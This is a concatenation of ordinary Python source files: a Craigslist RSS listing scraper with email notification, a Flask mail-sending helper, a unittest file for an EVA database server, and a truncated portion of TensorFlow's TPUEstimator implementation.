return False
def NewPost(post, data_config, cl_listings):
timestamp = UnixTime(post['published'])
for stored_post in cl_listings:
if post['id'] == stored_post.id:
Log.log('Duplicate ' + post['title'])
return False
notify_pair = [(k, v) for k, v in data_config['notification_intervals'].items()]
notify_pair = sorted(notify_pair, key=lambda x: (UnixTime(x[0])))
first_notify = notify_pair[0]
last_notify = notify_pair[len(notify_pair) - 1]
for notify_time, notify_sent_flag in notify_pair:
if notify_sent_flag:
if notify_time != first_notify[0]:
prior_interval = notify_pair[notify_pair.index((notify_time, notify_sent_flag)) - 1]
if not prior_interval[1] and notify_sent_flag:
if timestamp > UnixTime(prior_interval[0]):
return True
elif notify_time == first_notify[0]:
if timestamp >= UnixTime(last_notify[0]) - 86400:
return True
elif timestamp >= UnixTime(notify_time):
return True
return False
def UnixTime(time_element):
try:
ts = datetime.strptime(''.join(time_element.rsplit(':', 1)), '%Y-%m-%dT%H:%M:%S%z')
except ValueError:
today = datetime.now().strftime('%Y-%m-%d') + 'T' + time_element
ts = datetime.strptime(''.join(today.rsplit(':', 1)), '%Y-%m-%dT%H:%M:%S%z')
    # timestamp() respects the parsed UTC offset and is portable, unlike strftime("%s")
    return int(ts.timestamp())
def ImageFilter(post, data_config):
if data_config['require_image']:
if 'enc_enclosure' not in post:
Log.log('Filtered ' + post['title'] + ' // enc_enclosure missing')
return False
if 'resource' not in post['enc_enclosure']:
Log.log('Filtered ' + post['title'] + ' // enc_enclosure/resource missing')
return False
if 'images' not in post['enc_enclosure']['resource']:
Log.log('Filtered ' + post['title'] + ' // enc_enclosure/resource/images missing')
return False
return True
def PriceFilter(post, data_config):
split_title = post['title'].rsplit(';', 1)
if len(split_title) > 1:
price = int(split_title[len(split_title) - 1])
if int(data_config['minimum_price']) > price:
Log.log('Filtered ' + post['title'] + ' // Price too low, $' + str(price))
return False
elif int(data_config['maximum_price']) < price:
Log.log('Filtered ' + post['title'] + ' // Price too high, $' + str(price))
return False
else:
post['price'] = price
return True
Log.log('Filtered ' + post['title'] + ' // no price in post')
return False
def KeywordFilter(post, data_config):
keyword_matches = []
for keyword in data_config['keywords']:
if keyword.lower() in post['title'].lower():
if keyword.lower() not in keyword_matches:
keyword_matches.append(keyword.lower())
if keyword.lower() in post['summary'].lower():
if keyword.lower() not in keyword_matches:
keyword_matches.append(keyword.lower())
if len(keyword_matches) >= int(data_config['minimum_keyword_match']) or len(keyword_matches) == len(data_config['keywords']):
post['keyword_matches'] = keyword_matches
return True
else:
Log.log('Filtered ' + post['title'] + ', insufficient keyword matches')
return False
def ParseFeed(feed, data_config, cl_listings):
new_posts = 0
for post in feed['items']:
if ImageFilter(post, data_config):
if PriceFilter(post, data_config):
if NewPost(post, data_config, cl_listings):
if KeywordFilter(post, data_config):
post['title'] = post['title'].split('&#x', 1)[0]
new_post = CL_Post(post)
cl_listings.append(new_post)
new_posts += 1
Log.log(str(new_posts) + ' new posts detected')
def PullFeeds(location, category, result, index):
feed = feedparser.parse('http://' + location +'.craigslist.org/search/' + category + '?format=rss')
result[index] = feed
def UpdateIntervals(notify_pair):
interval_dict = {}
for notify_time, notify_sent_flag in notify_pair.items():
if UnixTime(notify_time) <= time.time():
interval_dict[notify_time] = False
else:
interval_dict[notify_time] = True
return interval_dict
def LoadJson(file_path):
try:
with open(file_path, 'r') as f:
content = json.load(f)
f.close()
return content
except IOError as err:
print(err)
def WriteJson(file_path, content):
with open(file_path, 'w') as f:
if type(content) == list:
f.write(json.dumps([j.__dict__ for j in content], indent=4, sort_keys=True))
elif type(content) == str:
str_as_json = json.loads(content)
content = json.dumps(str_as_json, indent=4, sort_keys=True)
f.write(content)
elif type(content) == dict:
content = json.dumps(content, indent=4, sort_keys=True)
f.write(content)
f.close()
def IsEmpty(file_path):
if os.stat(file_path).st_size == 0:
return True
return False
def MakeEmpty(file_path):
with open(file_path, 'w') as f:
pass
f.close()
def main():
data_config_file = 'data_config.json'
email_config_file = 'email_config.json'
stored_posts_file = 'stored_posts.json'
log_file = datetime.now().strftime('%Y-%m-%dT%H:%M:%S%z') + '.log'
global Log
Log = Logging(log_file)
data_config = LoadJson(data_config_file)
email_config = LoadJson(email_config_file)
if int(data_config['logging_enabled']):
Log.start()
cl_listings = []
if not IsEmpty(stored_posts_file):
sp = LoadJson(stored_posts_file)
[cl_listings.append(CL_Post(stored_post)) for stored_post in sp]
Log.log('Imported ' + str(len(cl_listings)) + ' saved posts')
socket.setdefaulttimeout(10)
threads_required = 0
for _ in data_config['locations']:
for __ in data_config['categories']:
threads_required += 1
threads = [None] * threads_required
results = [None] * threads_required
index = 0
for location in data_config['locations']:
for category in data_config['categories']:
threads[index] = Thread(target=PullFeeds, args=(location, category, results, index))
threads[index].start()
index += 1
[threads[i].join() for i in range(threads_required)]
[ParseFeed(feed, data_config, cl_listings) for feed in results]
if len(cl_listings) > 0:
if CheckNotityInterval(data_config['notification_intervals']):
email = CL_Email(email_config)
email.write(cl_listings)
email.send()
Log.log('Email sent to ' + str(email.recipient))
if not IsEmpty(stored_posts_file):
MakeEmpty(stored_posts_file)
Log.log('Emptied contents of ' + str(stored_posts_file))
else:
Log.log('Storing posts to ' + str(stored_posts_file))
WriteJson(stored_posts_file, cl_listings)
Log.log('Successful write to ' + str(stored_posts_file))
else:
Log.log('No new posts detected')
data_config['notification_intervals'] = UpdateIntervals(data_config['notification_intervals'])
WriteJson(data_config_file, data_config)
Log.log('Updated contents of ' + str(data_config_file))
if __name__ == '__main__':
while True:
main()
time.sleep(3600)
|
mails.py
|
from urllib import parse as urlparse
from threading import Thread
from flask import render_template, current_app
from flask_mail import Message
from werkzeug.datastructures import FileStorage
from app.extensions import mail
def email_confirmation_url(token):
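    # Builds an absolute frontend link of the form
    # <SCHEME>://<FRONTEND_URL><FRONTEND_EMAIL_CONFIRM_URL>?token=<token>,
    # preserving any query parameters already present in the configured path.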
frontend_url = current_app.config['SCHEME']+'://'+current_app.config['FRONTEND_URL']
email_confirmation_path = current_app.config['FRONTEND_EMAIL_CONFIRM_URL']
full_url = urlparse.urljoin(frontend_url, email_confirmation_path)
url_parts = list(urlparse.urlparse(full_url))
query = dict(urlparse.parse_qsl(url_parts[4]))
query.update({
'token': token
})
url_parts[4] = urlparse.urlencode(query)
return urlparse.urlunparse(url_parts)
def password_reset_url(token):
frontend_url = current_app.config['SCHEME']+'://'+current_app.config['FRONTEND_URL']
password_reset_path = current_app.config['FRONTEND_PASSWORD_RESET_URL']
full_url = urlparse.urljoin(frontend_url, password_reset_path)
url_parts = list(urlparse.urlparse(full_url))
query = dict(urlparse.parse_qsl(url_parts[4]))
query.update({
'token': token
})
url_parts[4] = urlparse.urlencode(query)
return urlparse.urlunparse(url_parts)
def send_async_mail(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(email: str, subject: str, message: str, *, sender=None, attachment: FileStorage=None):
msg = Message(
sender=sender,
subject=subject,
recipients=[email],
html=message,
)
if attachment is not None:
msg.attach(attachment.filename, attachment.content_type, attachment.stream.read())
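    # Grab the real application object: current_app is a context-local proxy
    # and cannot be dereferenced from the worker thread that sends the mail.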
app = current_app._get_current_object()
thr = Thread(target=send_async_mail, args=[app,msg])
thr.start()
# mail.send(msg)
def send_registration_email(email: str, fullname: str, token: str):
send_mail(
email=email,
subject='Registration on SFT',
message=render_template(
template_name_or_list='registration.html',
fullname=fullname,
token=token, secret_url=email_confirmation_url(token)
)
)
def send_password_recovery_email(email: str, fullname: str, token: str):
send_mail(
email=email,
subject='Password recovery on SFT',
message=render_template(
template_name_or_list='password_recovery.html',
fullname=fullname,
token=token, secret_url=password_reset_url(token)
)
)
def send_email_changing_email(email: str, fullname: str, token: str):
send_mail(
email=email,
subject='Email changing on SFT',
message=render_template(
template_name_or_list='email_changing.html',
fullname=fullname,
token=token, secret_url=email_confirmation_url(token)
)
)
def send_feedback(from_email: str, name: str, topic: str, message: str, attachment=None):
send_mail(
sender=from_email,
email=current_app.config['MAIL_FEEDBACK'],
subject=f'Feedback: {topic}',
message=render_template('feedback.html', fullname=name, message=message),
attachment=attachment
)
|
test_server.py
|
# coding=utf-8
# Copyright 2018-2020 EVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import time
import threading
import mock
import asyncio
from unittest.mock import MagicMock
from eva.server.server import start_server
from eva.server.server import EvaServer
from concurrent.futures import CancelledError
class ServerTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
self.stop_server_future = self.loop.create_future()
asyncio.set_event_loop(None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_server(self):
host = "0.0.0.0"
port = 5489
socket_timeout = 60
def timeout_server():
# need a more robust mechanism for when to cancel the future
time.sleep(2)
self.stop_server_future.cancel()
thread = threading.Thread(target=timeout_server)
thread.daemon = True
thread.start()
with self.assertRaises(CancelledError):
start_server(host=host, port=port,
loop=self.loop,
socket_timeout=socket_timeout,
stop_server_future=self.stop_server_future)
def test_server_protocol_connection_lost(self):
socket_timeout = 65
eva_server = EvaServer(socket_timeout)
eva_server.transport = mock.Mock()
eva_server.transport.close = MagicMock(return_value="closed")
eva_server.transport.abort = MagicMock(return_value="aborted")
# connection made
eva_server.connection_made(eva_server.transport)
self.assertEqual(EvaServer.__connections__, 1,
"connection not made")
# connection lost
eva_server.connection_lost(None)
self.assertEqual(EvaServer.__connections__, 0,
"connection not lost")
self.assertEqual(EvaServer.__errors__, 0,
"connection not errored out")
# connection made
eva_server.connection_made(eva_server.transport)
self.assertEqual(EvaServer.__connections__, 1,
"connection not made")
# connection lost with error
eva_server.connection_lost(mock.Mock())
self.assertEqual(EvaServer.__connections__, 0,
"connection not lost")
self.assertEqual(EvaServer.__errors__, 1,
"connection not errored out")
def test_server_protocol_data_received(self):
socket_timeout = 60
eva_server = EvaServer(socket_timeout)
eva_server.transport = mock.Mock()
eva_server.transport.close = MagicMock(return_value="closed")
eva_server.transport.abort = MagicMock(return_value="aborted")
# data received
data = mock.Mock()
data.decode = MagicMock(return_value="4|quit")
self.assertEqual(eva_server.data_received(data), "closed",
"transport not closed")
asyncio.set_event_loop(None)
with self.assertRaises(RuntimeError):
data.decode = MagicMock(return_value="5|query")
# error due to lack of asyncio loop
eva_server.data_received(data)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increments the eval step by 1 by default, so we add the
# remaining difference here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
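# Worked example (editorial sketch): with iterations_per_loop = 100, Estimator's
# built-in eval-step increment of 1 plus this op's increment of
# iterations_per_loop - 1 = 99 accounts for the 100 eval steps that actually ran
# inside the TPU loop for that Session.run.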
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
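# Illustrative usage (editorial sketch; names are hypothetical):
#   status_logger = PeriodicLogger(seconds=60)
#   for step in range(num_steps):
#     status_logger.log('processed step %d', step)  # at most one INFO per 60s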
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
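# Illustrative sketch (editorial): the infeed/outfeed controller threads below
# consume these values from a work queue, e.g. `queue.put(16)` requests 16 more
# iterations, while `queue.put(_SIGNAL.STOP)` asks the thread to shut down (see
# _OpQueueContext.send_next_batch_signal and _OpQueueContext.stop).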
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
the `eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call`
currently works for train() and evaluate(). The function is executed on the
CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._tpu_compile_op = tpu_compile_op
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitializing the
# TPU here would cause variable corruption, since the previously allocated
# memory might be overwritten for other purposes.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
